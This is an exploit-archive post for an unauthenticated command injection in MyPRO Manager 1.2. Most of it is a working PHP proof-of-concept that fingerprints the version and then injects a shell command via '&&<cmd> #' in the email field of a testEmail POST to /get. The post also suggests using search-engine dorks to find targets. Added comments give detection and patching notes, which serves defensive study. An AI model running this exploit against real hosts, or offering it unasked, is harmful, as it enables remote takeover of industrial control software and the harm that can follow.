MyPRO Manager 1.2 Command Injection
=============================================================================================================================================
| # Title MyPRO Manager 1.2 Command Injection
=============================================================================================================================================
| # Title : MyPRO Manager 1.2 command injection (PoC written in PHP) |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.myscada.org/mypro/ |
=============================================================================================================================================
POC :
[+] Dorking ?n Google Or Other Search Enggine.
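[+] Code Description: MyPRO Manager versions 1.2 and below suffer from an unauthenticated command injection vulnerability. The PoC below places the injected command in the `email` field of a `testEmail` request POSTed to `/get`.
(Related: https://packetstorm.news/files/id/189175/ ; related CVE: CVE-2024-47407.) Affected installations should be updated to a vendor-fixed release, and the manager interface should not be reachable from untrusted networks.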
[+] save code as poc.php.
[+] Set Target : line 79.
[+] Usage : php poc.php
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the MyPRO Manager command injection (CVE-2024-47407 per the page header).
 *
 * The class does two things over HTTP against a base URL supplied by the caller:
 *   1. check()   - GETs a JavaScript asset and reads a version string out of it.
 *   2. exploit() - POSTs a JSON `testEmail` command to `/get` whose `email` value carries
 *                  `&&<command> #` after a random address.
 *
 * Defender notes (derived from the requests this code builds):
 *   - No credential, cookie or token is attached to either request; the only header set is
 *     `Content-Type: application/json`.
 *   - A detection rule can key on POST `/get` bodies where `command` is `testEmail` and the
 *     `email` value contains shell metacharacters such as `&&` or `#`. The address part is
 *     randomised per request, so a fixed-string match on the address will not work.
 *   - Server-side, the fix is to validate the `email` value and never pass it through a shell;
 *     the vulnerable code itself is not shown on this page.
 */
class MyPROManagerExploit {
// Base URL of the target; '/assets/...' and '/get' are appended to it verbatim.
private $targetUri;
// NOTE(review): $rport, $ssl and $targetPath are declared but never read by any method below.
// 34022 is presumably the manager's default listening port, which makes it the port to
// firewall and monitor; confirm against vendor documentation.
private $rport = 34022;
private $ssl = false;
private $targetPath = '/';
/**
 * @param string $targetUri Base URL (scheme and host) that request paths are appended to.
 */
public function __construct($targetUri) {
$this->targetUri = $targetUri;
}
/**
 * Fingerprints the target by version string.
 *
 * Fetches one hard-coded asset, extracts the value of `const v="..."` from it and compares
 * that value with '1.2' using version_compare().
 *
 * @return string "Appears vulnerable" when the extracted version is <= 1.2, "Safe" when it is
 *                greater, "Unknown" when the pattern is not found or an Exception is caught.
 *
 * NOTE(review): the asset name contains what looks like a build hash, so other builds would
 * presumably serve a different file name and yield "Unknown". Neither "Safe" nor "Unknown"
 * is evidence that a host is patched; verify the installed version directly.
 */
public function check() {
try {
$url = $this->targetUri . '/assets/index-Aup6jYxO.js';
$response = $this->sendRequest($url, 'GET');
if (preg_match('/const v="([^"]+)"/', $response, $matches)) {
$version = $matches[1];
echo 'Version retrieved: ' . $version . "\n";
if (version_compare($version, '1.2', '<=')) {
return "Appears vulnerable";
}
return "Safe";
}
} catch (Exception $e) {
// sendRequest() reports failure through its return value rather than by throwing,
// so this branch is a fallback only.
return "Unknown";
}
return "Unknown";
}
/**
 * Public entry point; forwards $cmd unchanged to executeCommand().
 *
 * @param string $cmd Command text that ends up inside the `email` field of the request.
 */
public function exploit($cmd) {
$this->executeCommand($cmd);
}
/**
 * Sends the request via execMyPROMgr() and then prints a fixed completion message.
 * The message is printed regardless of what execMyPROMgr() reported.
 */
private function executeCommand($cmd) {
$this->execMyPROMgr($cmd);
echo 'Exploit finished, check thy shell.' . "\n";
}
/**
 * Builds and sends the injection request.
 *
 * The JSON body has two keys: `command` = 'testEmail' and `email` = a random
 * `<local>@<domain>.com` string followed by `&&`, the caller's command and ` #`.
 * The `&&` and the trailing `#` are the parts a log or WAF rule should look for in the
 * `email` value; a legitimate address contains neither.
 */
private function execMyPROMgr($cmd) {
$postData = [
'command' => 'testEmail',
'email' => $this->generateRandomString(3, 12) . '@' . $this->generateRandomString(4, 8) . '.com&&' . $cmd . ' #'
];
$response = $this->sendRequest($this->targetUri . '/get', 'POST', json_encode($postData));
// NOTE(review): see getHttpResponseCode(); as written this comparison does not inspect a real
// HTTP status, so the message printed here is not a reliable indicator either way.
if ($response && $this->getHttpResponseCode($response) == 200) {
echo 'Command successfully executed, check your shell.' . "\n";
} else {
echo 'Unexpected or no reply received.' . "\n";
}
}
/**
 * Minimal cURL wrapper.
 *
 * @param string      $url    Full URL to request.
 * @param string      $method HTTP verb, set through CURLOPT_CUSTOMREQUEST.
 * @param string|null $data   Request body; only attached when $method is 'POST'.
 * @return string|false Response body, or false when curl_exec() fails.
 *
 * No timeout, TLS or header-capture options are set, so the return value is the body only.
 */
private function sendRequest($url, $method, $data = null) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($method === 'POST') {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
/**
 * Returns a random alphanumeric string of between $minLength and $maxLength characters.
 *
 * Built by shuffling a 62-character alphabet and taking a prefix, so no character repeats
 * within one result. Uses rand()/str_shuffle(), which are not cryptographically secure;
 * here the value only varies the address part of the `email` field.
 */
private function generateRandomString($minLength, $maxLength) {
$length = rand($minLength, $maxLength);
return substr(str_shuffle('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);
}
/**
 * Returns characters 9-11 of $response.
 *
 * NOTE(review): this offset matches a raw status line such as "HTTP/1.1 200", but
 * sendRequest() does not enable CURLOPT_HEADER, so $response holds the body only and
 * these three characters are body bytes, not a status code.
 */
private function getHttpResponseCode($response) {
return substr($response, 9, 3); // Assuming response contains status code as the first 3 digits after HTTP/1.1
}
}
// Example usage
// 'http://example.com' is a placeholder base URL; the class appends its request paths to it.
$exploit = new MyPROManagerExploit('http://example.com');
// Version probe first; check() returns "Appears vulnerable", "Safe" or "Unknown".
$checkResult = $exploit->check();
echo $checkResult . "\n";
// The injection request is sent only when the probe reported a version <= 1.2.
// NOTE(review): the probe relies on a version string in one asset file, so its result says
// nothing definite about patch status.
if ($checkResult == "Appears vulnerable") {
$exploit->exploit('id'); // Exploit with a sample command like 'id'
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================